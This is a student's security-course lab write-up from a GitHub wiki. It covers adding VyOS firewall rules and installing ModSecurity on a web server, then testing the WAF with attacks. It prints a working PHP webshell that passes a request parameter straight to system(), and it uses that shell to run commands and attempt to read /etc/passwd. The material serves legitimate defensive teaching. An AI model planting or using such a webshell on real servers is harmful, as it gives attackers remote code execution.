Lab 5.1 Wazuh WAF - savannahc502/SavC-TechJournal-SEC350 GitHub Wiki

In this lab, I will alter web01 by adding a Web Application Firewall (WAF). The Wazuh agent should already be sending Apache error logs. I will then run malicious http requests against web01 to see how the WAF performs.

Currently, web01's ability to talk to the WAN and the WANs ability to talk to web01 is restricted. VYOS itself cannot filter by domain name such as allowing traffic to updates.centos.org. It has to be by IP address or subnet. For this reason, many organizations go to an internal mirror for this purpose. Instead, I will use a work around.

WAN-to-DMZ

On FW01:

set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable

These commands add a new permanent rule to vyos such that established connections from the DMZ-to-WAN are allowed back through the WAN-to-DMZ firewall.

DMZ-to-WAN

On FW01:

set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3

For the workaround, I will add this temporary rule that will either deleted, disabled or discarded when the software downloading is complete.

Adding mod_security, the Core Rule Set, and Php to web01

This command was given to the class by the instructor since many of the mod_security guides online are inaccurate. Once the installation has worked, make sure to delete, disable or discard rule 999.

sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
sudo systemctl restart httpd

Deliverable 1

Show that security2_module is loaded:

image

Show that Apache (httpd) error log is present:

image

Deliverable 2

Show that rw01 can reach web01

image

Testing ModSecurity

Download a php webshell to /var/www/html/shell.php on web01. I used this one.

cd /var/www/html
nano shell.php

Contents of shell.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

Deliverable 3

Use the php webshell to execute a command like ifconfig, hostname or whoami. Provide a screenshot showing remote code execution.

image

Deliverable 4:

Screenshot of when attempting to run cat /etc/passwd

image

Deliverable 5:

Find the error or warning associated with Deliverable 4 in the apache error_log.

image

Deliverable 6:

Same events but in Wazuh

image

⚠️ **GitHub.com Fallback** ⚠️